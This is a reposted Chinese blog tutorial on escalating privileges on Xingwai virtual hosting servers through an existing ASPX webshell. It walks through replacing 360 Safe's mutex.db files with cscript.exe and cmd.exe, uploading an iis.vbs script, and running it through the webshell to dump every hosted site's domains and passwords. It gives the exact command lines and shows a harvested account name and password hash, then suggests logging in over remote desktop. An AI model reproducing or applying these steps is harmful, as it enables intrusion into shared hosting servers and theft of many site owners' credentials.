星外提权

星外提权方法

打开我们的aspx马 http://www.xxxxoooo.com/template/default/html/z.aspx

第一步 查找 c:\Program Files\360\360Safe\deepscan\Section\ 这个目录中的mutex.db 这个文件是360安全卫士的病毒库文件 我们要把这个文件替换成可执行的文件 打我们的 提权专用 文件夹 打开后,把cscript.exe命名为mutex.db 然后在把这文件上传到 c:\Program Files\360\360Safe\deepscan\Section\ 这个文件夹,上传后会替换mutex.db这个文件 上传替换成功

第二步 再次查找 c:\Program Files\360\360SD\deepscan\Section\ 这个目录中的mutex.db 和第一步一样 把cmd.exe命名为mutex.db 命名好以后上传 然后上传到 c:\Program Files\360\360SD\deepscan\Section\ 这个目录下,上传后会替换mutex.db这个文件 上传替换成功

第三步 还有一步没有做 要把 提权专用 文件中的iis.vbs上传到网站根目录下 好了,我上传好了

第四步 开始查看服务器上所有域名和密码 打开aspx马中的 cmdshell CmdPath:      输入cmd.exe替换的mutex.db的地址 Argument:      是输入命令的地方

命令是

/c "c:\Program Files\360\360Safe\deepscan\Section\mutex.db" d:\freehost\web\iis.vbs

上边的那句是命令方法 这个命令的意思就是 在c盘下执行 cscript.exe 使 iis.vbs能收集网站的所有域名和密码 d:\freehost\web\ 是咱们已经拿到webshell站的根目录

然后点确定

晕死,出错了

重试一下 丢大人了,上传目录问题 上边的命令改为 /c "c:\Program Files\360\360Safe\deepscan\Section\mutex.db" d:\freehost\damute\web\template\default\html\iis.vbs 这个命令,刚才是上传的地址没有弄在根目录下

下面我们开始 时间有些长,我们等着 出来了

我们把这些保存起来

查找星外受控端 找到了 这个就是用户名  freehostrunat 密码是:  991b95d33a17713068403079d4fe40a4!7 如果对方开了3389 我们就去登录吧

完成了。送我的哥们 酷帅王子 丢人了!!呵呵!

c:\Program Files\360\360Safe\deepscan\Section\mutex.db  cir c:\Program Files\360\360SD\deepscan\Section\mutex.db   cmd

 

d:\freehost\damute\web\

/c “c:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cscript.exe” d:\freehost\web\1.vbs

 

/c "c:\Program Files\360\360Safe\deepscan\Section\mutex.db" d:\freehost\damute\web\kkkkk.vbs

转载于:https://www.cnblogs.com/0xcc/archive/2011/11/13/2246944.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值